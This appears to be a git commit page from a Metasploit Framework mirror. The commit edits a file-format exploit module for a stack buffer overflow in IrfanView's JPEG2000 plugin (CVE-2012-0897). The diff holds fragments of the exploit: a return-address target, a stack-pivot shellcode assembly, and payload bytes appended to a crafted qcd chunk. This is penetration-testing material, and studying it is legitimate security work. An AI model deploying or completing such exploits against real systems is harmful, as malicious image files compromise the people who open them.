infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

last cleanup

unstable
jvazquez-r7 2012-06-30 14:18:25 +02:00
parent 19d476122b
commit 5dbfb7b9aa
1 changed files with 6 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
View File

@ -22,9 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. The vulnerability is
triggered via parsing an invalid qcd chunk structure and specfiying a
malformed qcd size and data.
version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
tested on a specific version of irfanview (v4.3.2), although other versions may
work also. The vulnerability is triggered via parsing an invalid qcd chunk
structure and specifying a malformed qcd size and data.
Payload delivery and vulnerability trigger can be executed in multiple ways.
The user can double click the file, use the file dialog, open via the icon
@ -43,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2012-0897' ],
[ 'OSVDB', '78333'],
[ 'BID', '51426' ],
[ 'URL', 'http://www.greyhathacker.net/?p=525' ]
[ 'URL', 'http://www.greyhathacker.net/?p=525' ],
],
'Platform' => [ 'win' ],
'DefaultOptions' =>
@ -59,10 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' =>
[
# push esp; retn [i_view32.exe]
[ 'Irfanview 4.33 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x0049a6b4 } ],
[ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
],
'DisclosureDate' => 'Jun 24 2011',
'DisclosureDate' => 'Jan 16 2012',
'DefaultTarget' => 0))
register_options(
@ -179,9 +179,6 @@ class Metasploit3 < Msf::Exploit::Remote
pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string
# pass 'cmp dword ptr [eax+ebx*4],ebp'
pivot << "\xff\x66" # we use this to reach the end of our function
qcd_data << encode_bytes(pivot)
qcd_data << egg